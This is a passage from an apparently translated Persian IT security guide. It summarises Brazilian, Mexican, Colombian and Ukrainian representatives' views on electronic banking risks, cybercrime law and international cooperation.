‫ﺟﺬﺏ ﻣﺸﺘﺮﻱ ﺑﻴﺸﺘﺮ ﺍﻳﻨﻄﻮﺭ ﻭﺍﻧﻤﻮﺩ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﻓﺴﺎﻧﺔ ﺍﻣﻨﻴـﺖ‬
‫ﺭﺍ ﺟﺎﻭﺩﺍﻧﻲ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺷـﻨﺎﺧﺖ ﺑﻴـﺸﺘﺮﻱ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﻣﺨﺎﻃﺮﺍﺕ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﻭ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ‬
‫ﻋﻤﻮﻡ ﻣﺮﺩﻡ ﺩﺍﺩﻩ ﺷﻮﺩ‪ ،‬ﭼﺮﺍﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺣـﻮﺯﻩ ﻣـﺴﺪﻭﺩ ﻛـﺮﺩﻥ‬
‫ﺍﻃﻼﻋــﺎﺕ ﺗﻨﻬــﺎ ﻣــﺸﻜﻼﺕ ﺭﺍ ﺣــﺎﺩﺗﺮ ﻣــﻲﻛﻨــﺪ‪ .‬ﺑﺨــﺼﻮﺹ‪،‬‬
‫ﻣــﺸﻜﻼﺕ ﺷــﮕﺮﻓﻲ ﺩﺭ ﺭﺍﺑﻄــﻪ ﺑــﺎ ﻃﺒﻴﻌــﺖ ﻓﺮﺍﺑﺨــﺸﻲ ﺟــﺮﺍﺋﻢ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺍﺯ ﺟﻤﻠﻪ ﻧﻔﻮﺫﻫﺎﻱ ﺳﺎﻳﺒﺮ ﻭ ﺩﺳﺘﻜﺎﺭﻱ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ‬
‫ﺑﺎﻧﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ‬
‫ﻻﺯﻡ ﺍﺳﺖ‪.‬‬
‫ﺑﺮﺯﻳﻞ‬
‫ﻧﻤﺎﻳﻨﺪﺓ ﺑﺮﺯﻳﻞ ﺧﺎﻃﺮﻧﺸﺎﻥ ﻛﺮﺩ ﻛﻪ ﺭﻗﺎﺑﺖ‪ ،‬ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﺑﻪ ﺳﺎﺧﺖ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﻪ ﻫﺪﺍﻳﺖ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﻳـﻦ ﻓﻨﺎﻭﺭﻳﻬـﺎ ﻣـﺴﺘﻌﺪ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻫﺴﺘﻨﺪ‪ .‬ﻣﻴﺎﻥ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺧـﺪﻣﺎﺕ ﺍﺯ ﻳـﻚ ﺳـﻮ ﻭ‬
‫ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎ ﺍﺯ ﺳﻮﻱ ﺩﻳﮕﺮ‪ ،‬ﻳﻚ ﺗـﻮﺍﺯﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻛـﺎﺭﺁﻳﻲ‬
‫ﻓﻨﻮﻥ ﺑﺮﮔـﺰﺍﺭﻱ ﺁﺯﻣـﻮﻥ ﺑـﺮﺍﻱ ﺩﻭﺭﻩﻫـﺎﻱ ﺁﻣﻮﺯﺷـﻲ ﺩﺭ ﺑﺮﺯﻳـﻞ‬
‫ﺩﺭﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﭘﺎﺳــﺦ ﺑــﻪ ﺍﻳــﻦ ﺳــﺆﺍﻝ ﻛــﻪ ﻣﺆﺳــﺴﺎﺕ ﭼﻨــﺪﻣﻠﻴﺘﻲ ﭼﮕﻮﻧـﻪ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻛﺸﻮﺭﻫﺎ ﻛﻤﻚ ﻛﻨﻨﺪ‪ ،‬ﺑﺮﺯﻳﻠﻲ ﻫﺎ ﻣﺎﻳﻞ ﺑﻮﺩﻧﺪ ﻛﻪ ﺩﺭ‬
‫ﺯﻣﻴﻨﻪﻫﺎﻱ ﺯﻳﺮ ﺑﻪ ﺁﻧﻬـﺎ ﻛﻤـﻚ ﺷـﻮﺩ‪ :‬ﺑﺮﮔـﺰﺍﺭﻱ ﺁﺯﻣـﻮﻥ ﺑـﺮﺍﻱ‬
‫ﺩﻭﺭﻩﻫﺎﻱ ﺁﻣﻮﺯﺷﻲ‪ ،‬ﺗﺪﻭﻳﻦ ﺭﺍﻫﻜﺎﺭﻫﺎ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ‪ ،‬ﻭ‬
‫ﻧﻴﺰ ﺍﻳﺠﺎﺩ ﻣﺪﻟﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺑﺎ ﺣﺪﺍﻗﻞ ﻗﻮﺍﻧﻴﻦ ﺑﺎﻧﻜﻲ‪.‬‬
‫ﭘﺮﺳﺶ‬
‫ﺑﺮﺯﻳﻠﻲﻫﺎ ﭘﺮﺳﻴﺪﻧﺪ ﻛﻪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻃﺒﻴﻌﺖ ﭘﻮﻳﺎ ﻭ ﭘﻴﺸﺮﻓﺖ ﺳﺮﻳﻊ‬
‫ﻓﻨﺎﻭﺭﻱ ﻛﻪ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺭﺍ ﻣﺸﻜﻞ ﺳـﺎﺧﺘﻪ‪ ،‬ﭼﮕﻮﻧـﻪ ﻣـﻲ ﺗـﻮﺍﻥ‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﻗﺎﻧﻮﻧﻲ ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﺮﺩ‪.‬‬
‫ﻣﻜﺰﻳﻚ‬
‫ﺩﺭ ﭘﺎﺳــﺦ ﺑــﻪ ﻧﮕﺮﺷــﻬﺎﻱ ﻣﻤﻜــﻦ ﺩﺭ ﺭﺧــﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴــﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﻣﻜﺰﻳــﻚ ﺍﺷــﺎﺭﻩ ﻛــﺮﺩ ﻛــﻪ ﺍﻣﻜــﺎﻥ ﺩﺳﺘﺮﺳــﻲ‬
‫ﺑﻪﺷﻤﺎﺭﻩﻫﺎﻱ ‪ PIN‬ﺍﺯ ﻃﺮﻳﻖ ﻭﺏ ﺭﻭ ﺑﻪ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ ﻭ ﺍﻳـﻦ‬
‫ﻣﺴﺌﻠﻪ ﺟﺪﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﻴﺸﺘﺮ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭ ﻫﺮ ﺻـﻮﺭﺕ ﺁﻧﻬـﺎ‬
‫ﺗﻼﺷﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﻛﻨﻨﺪ‪،‬‬
‫ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻇﺮﻓﻴﺘﻬﺎﻱ ﻛﻨﺘﺮﻟـﻲ ﻗـﻮﻱ ﺩﺍﺭﻧـﺪ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ‬
‫ﺍﻣﻨﻴﺘ ـﻲ ﻭ ﻧﻈــﺎﺭﺗﻲ ﺑــﺴﻴﺎﺭﻱ ﻫــﺴﺘﻨﺪ ﻛــﻪ ﺩﺭ ﺯﻣﻴﻨــﺔ ﻓﻨــﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺗﺨﺼﺺ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺑﻌﻼﻭﻩ ﻣﻜﺰﻳﻚ ﺗﻮﺻـﻴﻪﻫـﺎﻱ‬
‫‪ BASEL‬ﺭﺍ ﺑﺮﺍﻱ ﻛﻨﺘـﺮﻝ ﻣﺨـﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ ﻟﺤـﺎﻅ ﻛـﺮﺩﻩ‬
‫ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﭘﺎﺳﺦ ﺑﻪ ﺳﺆﺍﻝ ﺳﻮﻡ‪ ،‬ﻣﻜﺰﻳﻜﻲﻫﺎ ﺑﺮﺍﻱ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻦ‬
‫ﺗﺠﺮﺑﻴﺎﺕ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲﻫﺎ ﻭ ﻧﻴﺎﺯﻫﺎ ﭘﻴﺸﻨﻬﺎﺩ ﻛﺮﺩﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺟﻬـﺎﻧﻲ‬
‫ﻣﻴﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻣﺒﺎﺩﻟﻪ ﺷﻮﺩ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫‪.۱‬‬
‫ﺩﺭ ﺯﻣﻴﻨﺔ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﻪ ﻧﮕﺮﺷـﻬﺎﻳﻲ‬
‫ﻣﻲ ﺑﻴﻨﻴﺪ؟ ﺑﺰﺭﮔﺘﺮﻳﻦ ﭼﺎﻟﺸﻬﺎ ﻳﺎ ﺁﺳﻴﺐ ﭘـﺬﻳﺮﻳﻬﺎ ﻛﺪﺍﻣﻨـﺪ؟‬
‫)ﺳﺮﻗﺖ ﻫﻮﻳﺖ‪ ،‬ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ‪ ،‬ﭘﻮﻟـﺸﻮﻳﻲ ﺍﻳﻨﺘﺮﻧﺘـﻲ‪ ،‬ﻳـﺎ ﺳـﺎﻳﺮ‬
‫ﺍﹶﺷﻜﺎﻝ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ(‬
‫ﭘﺎﺳﺦ‬
‫‪٢٢٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﭘﺮﺳﺶ‬
‫ﺹ ﻋﻤﻖ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺳﻨﮕﺎﭘﻮﺭ ﺳﺆﺍﻝ ﻛﺮﺩ‪.‬‬
‫ﻣﻜﺰﻳﻚ ﺩﺭﺧﺼﻮ ﹺ‬
‫ﭘﺎﺳﺦ‬
‫ﺗﺠﺮﺑﻴﺎﺕ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﺳﻨﮕﺎﭘﻮﺭ ﺑﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﺩﺳﺘﺮﺱ‬
‫ﺍﺳﺖ‪ ٢٣٧.‬ﺍﻳﻦ ﺧﻂﻣﺸﻲﻫـﺎ ﺷـﺎﻣﻞ ‪ ۲۶‬ﻓﻌﺎﻟﻴـﺖ ﺩﺭ ﺣـﻮﺯﻩﻫـﺎﻱ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‪ ،‬ﻭﺻـﻠﻪﻫـﺎ‪ ،‬ﻧﻘـﺸﻬﺎ ﻭ ﻣـﺴﺌﻮﻟﻴﺘﻬﺎ‪ ،‬ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﺿﺪﻭﻳﺮﻭﺱ‪ ،‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‪ ،‬ﻭ ﻏﻴﺮﻩ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﻛﻠﻤﺒﻴﺎ‬
‫ﻧﻤﺎﻳﻨﺪﺓ ﻛﻠﻤﺒﻴﺎ ﺑﻴﺎﻥ ﺩﺍﺷﺖ ﻛﻪ ﻣﺸﻜﻼﺕ ﺍﻳﻤﻨﻲ ﺁﻧﻬﺎ ﻣﺎﻧﻨﺪ ﺳﺎﻳﺮ‬
‫ﻛﺸﻮﺭﻫﺎ ﺍﺳﺖ ﻭ ﺁﻧﻬﺎ ﻧﻴﺰ ﺧﻮﺩ ﺭﺍ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻣـﻲﺑﻴﻨﻨـﺪ‪ .‬ﺩﺭﺣـﺎﻝ‬
‫ﺣﺎﺿﺮ ﺍﻳﻦ ﻛﺸﻮﺭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎ ﻧﺪﺍﺭﺩ ﻭ‬
‫ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻧﻴـﺰ ﺩﺭ ﺁﻥ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻧـﺸﺪﻩ‬
‫ﺍﺳﺖ‪ .‬ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﻩ ﻫﺎ ﻱ ﻛﻠﻤﺒﻴﺎﻳﻲ ﻣﺴﺘﻌﺪ ﻫﺴﺘﻨﺪﻛﻪ ﻗﺮﺑـﺎﻧﻲ‬
‫ﺣﻤﻼﺕ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ‪ ،‬ﺳـﺮﻗﺖ ﻫﻮﻳـﺖ ﺩﺭﺣـﺎﻝ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ‪،‬‬
‫ﻛﺎﺭﺗﻬــﺎﻱ ﺑــﺎﻧﻜﻲ ﺟﻌــﻞ ﻣــﻲﺷــﻮﻧﺪ‪ ،‬ﻗــﺎﻧﻮﻧﻲ ﺑــﺮﺍﻱ ﺗــﻀﻤﻴﻦ‬
‫ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭﺟﻮﺩ ﻧـﺪﺍﺭﺩ‪ ،‬ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﺗﻨﻬـﺎ ﺑـﺮ ﻋﻬـﺪﺓ‬
‫ﻣﻤﻴﺰﻫﺎ ﺍﺳﺖ‪ PKI ،‬ﻭ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷـﻤﻨﺪ ﺑﻜـﺎﺭ ﻣـﻲﺭﻭﻧـﺪ ﺍﻣـﺎ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻧﻜﻬﺎ ﺩﺭ ﺣـﺪ ﻣﻘـﺪﻣﺎﺗﻲ ﺍﺳـﺖ‪ ،‬ﻛﺎﺭﻣﻨـﺪﺍﻥ‬
‫ﻻ ﺑﻪ ﺩﺳﺘﻮﺭﺍﺕ ﺍﻳﻤﻨﻲ ﺑﻲﺗـﻮﺟﻬﻲ ﻣـﻲﻛﻨﻨـﺪ ﻭ ﺍﻣﻨﻴـﺖ ﺩﺭ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﻓﺮﻫﻨﮓ ﺑﺎﻧﻜﻲ ﻛﻠﻤﺒﻴﺎ ﺩﺭ ﺟﺎﻳﮕﺎﻩ ﺻـﺤﻴﺢ ﺧـﻮﺩ ﻗـﺮﺍﺭ ﻧـﺪﺍﺭﺩ‪ ،‬ﻭ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﻫﻤﺔ ﺍﻳﻨﻬﺎ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑﻪﺭﻭﺯ ﻣﺎﻧﺪﻥ ﻧﻴﺰ ﻳﻚ ﻣﺸﻜﻞ‬
‫ﺍﺳﺎﺳﻲ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻣﺆﺳـﺴﺎﺕ ﭼﻨﺪﺟﺎﻧﺒـﻪ ﻧﻘـﺸﻲ‬
‫ﺍﺳﺎﺳــﻲ ﺩﺍﺭﻧــﺪ‪ .‬ﺑﻌﻨــﻮﺍﻥ ﻣﺜــﺎﻝ ‪ UNCITRAL‬ﺑــﺮﺍﻱ ﺟــﺮﺍﺋﻢ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺣﻮﺯﻩﻫﺎﻳﻲ ﭼﻮﻥ ﺁﺯﺍﺭ ﻭ ﺍﺫﻳﺖ‪ ،‬ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ‪ ،‬ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﻣﻌﺎﻣﻼﺕ‪ ،‬ﻳﻚ ﻗﺎﻧﻮﻥ ﻣﺮﺟﻊ ﺩﺍﺭﺩ‪ .‬ﺧﺼﻮﺻﻴﺖ ﻗـﻮﺍﻧﻴﻦ‬
‫ﻣﺮﺟﻊ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﺧﻼﻑ ﻗـﻮﺍﻧﻴﻦ ﻋـﺎﺩﻱ ﺑﺎﻳـﺪ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬
‫ﻗﻮﺍﻧﻴﻦ ﻣﺪﻧﻲ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﭘﺮﺳﺶ‬
‫ﻧﻤﺎﻳﻨﺪﺓ ﻛﻠﻤﺒﻴﺎ ﭘﺮﺳﻴﺪ ﻛﻪ ﺟﺎﻣﻌﻴﺖ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ‪،‬‬
‫ﺑﺨﺼﻮﺹ ﺑﺎ ﻣﻼﺣﻈﺎﺕ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ‪ ،‬ﭼﻄﻮﺭ ﺯﻳﺮ ﺳﺆﺍﻝ ﻣـﻲﺭﻭﺩ‪.‬‬
‫ﻣﺴﺎﺋﻠﻲ ﭼـﻮﻥ ﻣـﺴﺌﻮﻟﻴﺖ ﻭ ﻣـﺪﻳﺮﻳﺖ ﻣﺨـﺎﻃﺮﺍﺕ‪ ،‬ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ‬
‫‪237 http://wbln0018.worldbank.org/ html/Financial‬‬
‫‪SectorWeb.nsf/(attachmentweb)/Singpore_TR‬‬
‫‪Mguidelines28Feb03/$FILE/Singpore_TRMgu‬‬
‫‪idelines28Feb0‬‬
‫ﺍﺳﺎﺳﻲ ﻫﺴﺘﻨﺪ؛ ﺧﺼﻮﺻﹰﺎ ﻭﻗﺘﻲ ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ‪.‬‬
‫ﭘﺎﺳﺦ‬
‫ﺑﺪﻟﻴﻞ ﻣﻼﺣﻈﺎﺕ ﻗﻀﺎﻳﻲ‪ ،‬ﺣﺘﻲ ﺩﺭ ﺗﺸﺨﻴﺺ ﻣﺤﻞ ﻭﻗﻮﻉ ﺟـﺮﻡ‬
‫ﻧﻴﺰ ﻫﻤﻜﺎﺭﻱ ﻣﻴﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺿـﺮﻭﺭﻱ ﺍﺳـﺖ‪ .‬ﺑـﺮﺍﻱ‬
‫ﺁﻏﺎﺯ ﺑﺎﻳﺪ ﻳﻚ ﺯﺑﺎﻥ ﻣﺸﺘﺮﻙ ﺗﻮﺻـﻴﻒ ﻣـﺸﻜﻼﺕ‪ ،‬ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ‬
‫ﻼ‬
‫ﻛﺎﻫﺶ ﺁﻧﻬﺎ ﻭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻓﺮﺍﺑﺨـﺸﻲ ﺗـﺪﻭﻳﻦ ﺷـﻮﻧﺪ‪ .‬ﻣـﺜ ﹰ‬
‫ﺗﻌﺮﻳﻒ "ﻛﻼﻫﺒﺮﺩﺍﺭﻱ" ﺩﺭ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺑﺎ ﻣﺸﻜﻼﺗﻲ ﻫﻤﺮﺍﻩ ﺑﻮﺩ‪.‬‬
‫ﻳﻚ ﻧﻤﻮﻧﻪ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻓﺮﺍﺑﺨﺸﻲ ﻓﻌﺎﻝ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ‪ ،‬ﻛﻤﻴﺘـﺔ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺎﻟﻲ )‪ ٢٣٨(FATF‬ﺍﺳﺖ ﻛﻪ ﺑﺎ ﭘﻮﻟـﺸﻮﻳﻲ ﻭ ﺗﺮﻭﺭﻳـﺴﻢ‬
‫ﻣﺒﺎﺭﺯﻩ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺍﻭﻛﺮﺍﻳﻦ‬
‫ﭘــﺲ ﺍﺯ ﺍﺳــﺘﻘﻼﻝ ﺍﻭﻛــﺮﺍﻳﻦ‪ ،‬ﺩﺭ ﺳﻴــﺴﺘﻢ ﺑــﺎﻧﻜﻲ ﺍﻳــﻦ ﻛــﺸﻮﺭ‬
‫ﺗﻐﻴﻴﺮﺍﺗﻲ ﺭﺥ ﺩﺍﺩ ﻭ ﺑﺎﻋﺚ ﺷﺪ ﺩﺭ ﺁﻥ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ‪ .‬ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺜـﻞ ﺍﻣـﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ‬
‫ﺭﻣﺰﻧﮕــﺎﺭﻱ ﺗﻮﺳــﻂ ﺑﺎﻧــﻚ ﻣﻠــﻲ ﺍﺩﺍﺭﻩ ﻣــﻲﺷــﻮﻧﺪ‪ ٢٣٩.‬ﺍﺯ ﺯﻣــﺎﻥ‬
‫ﺍﺳﺘﻘﻼﻝ ﺍﻳﻦ ﻛﺸﻮﺭ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﺍﻣﻀﺎ ﻭ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ‬
‫ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻩﺍﻧﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺑﺮﺧﻲ ﺗﻼﺷﻬﺎ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑـﻪ ﺳﻴـﺴﺘﻢ‬
‫ﺑﺎﻧﻜﻲ‪ ،‬ﺗﺎﻛﻨﻮﻥ ﺧﺴﺎﺭﺕ ﺧﺎﺻﻲ ﮔﺰﺍﺭﺵ ﻧﺸﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﺣﻮﺯﺓ ﻗﻮﺍﻧﻴﻦ‪ ،‬ﺍﻭﻛﺮﺍﻳﻦ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﻣﻌﺎﻫﺪﺓ ﺟﺮﺍﺋﻢ ﺳـﺎﻳﺒﺮ‬
‫ﺭﺍ ﺍﻣﻀﺎ ﻛﺮﺩ ﻭ ﺍﺯ ﺁﻥ ﭘﺲ ﺑﻪ ﺗﻌﻘﻴﺐ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫ﭘﺮﺩﺍﺧﺖ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﭘﺎﺭﻟﻤﺎﻥ ﺁﻥ ﻛﺸﻮﺭ ﻳﻚ ﻗﺎﻧﻮﻥ ﺩﺭ ﺯﻣﻴﻨـﺔ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺑﻪ ﺗﺼﻮﻳﺐ ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﻣﺘﻦ‬
‫ﻗﻮﺍﻧﻴﻦ ﺟﻨﺎﻳﻲ ﺑﻪ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﻧﻴﺰ ﺗﻮﺟﻪ ﺷﺪﻩ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ‬
‫ﻗﻮﺍﻧﻴﻦ ﺗﺄﺛﻴﺮ ﻛﻤﻲ ﺑﺮ ﺟﺎﻱ ﻣﻲﮔﺬﺍﺭﻧﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺁﻧﻬـﺎ‬
‫ﺍﺑﺘﺪﺍ ﺑﺎﻳﺪ ﻋﺎﻣﻞ "ﻋﻤﺪ" ﻭ "ﻗﺼﺪ" ﺩﺭ ﺍﺭﺗﻜﺎﺏ ﺟﺮﻡ ﺑﻪ ﺍﺛﺒﺎﺕ ﺑﺮﺳﺪ‪.‬‬
‫ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻣـﻮﺍﺭﺩ‪ ،‬ﺗﻌﻘﻴـﺐ ﻧﺎﻛـﺎﻓﻲ ﺟـﺮﺍﺋﻢ ﺑـﻪ ﻳـﻚ ﺭﻭﺍﻝ‬
‫ﺭﻭﺯﻣﺮﻩ ﺑﺪﻝ ﺷﺪﻩ‪ ،‬ﭼﻮﻥ ﺍﺭﺍﺋﻪ ﻣﺪﺍﺭﻙ ﻣﺤﻜﻤﻪﭘﺴﻨﺪ ﺑﺮﺍﻱ ﺍﺛﺒـﺎﺕ‬
‫ﺗﻌﻤﺪﻱ ﺑﻮﺩﻥ ﭼﻨﻴﻦ ﺟﺮﺍﺋﻤﻲ ﻭﺍﻗﻌﹰﺎ ﺩﺷﻮﺍﺭ ﺍﺳﺖ‪ .‬ﻛﺎﺭﻛﻨﺎﻥ ﺑﺨﺶ‬
‫ﺍﻣﻨﻴﺖ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈـﺎﻣﻲ ﺑﺎﻳـﺪ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺟﻤـﻊﺁﻭﺭﻱ ﻣـﺪﺍﺭﻙ‬
‫ﺍﺛﺒﺎﺕ ﺟﺮﻡ ﺁﻣﻮﺯﺵ ﻛﺎﻓﻲ ﺑﺒﻴﻨﻨﺪ‪.‬‬
‫ﭘﺮﺳﺶ‬
‫ﺳﺌﻮﺍﻝ ﺍﺻﻠﻲ ﺍﻭﻛﺮﺍﻳﻦ ﺩﺭ ﻣﻮﺭﺩ ﺑﺮﺁﻭﺭﺩﻥ ﻣـﺴﺌﻮﻟﻴﺖ ﻭ ﺗﻌﻬـﺪ ﺑـﺎ‬
‫‪238 Financial Action Task Force‬‬
‫‪ ۲۳۹‬ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺗﻤﺎﻡ ﺑﺎﻧﻜﻬﺎ ﺟﺰﺋﻲ ﺍﺯ ﺳﻴﺴﺘﻢ ﺑﺎﻧﻚ ﻣﻠﻲ ﻣﺤﺴﻮﺏ ﻣـﻲ‪-‬‬
‫ﺷﻮﻧﺪ‪.‬‬
‫‪٢٢٥‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺩﺍﺧﻠﻲ ﻭ ﮔـﺰﺍﺭﺵ ﺑـﻮﺩ‪ .‬ﺑﻌﻨـﻮﺍﻥ‬
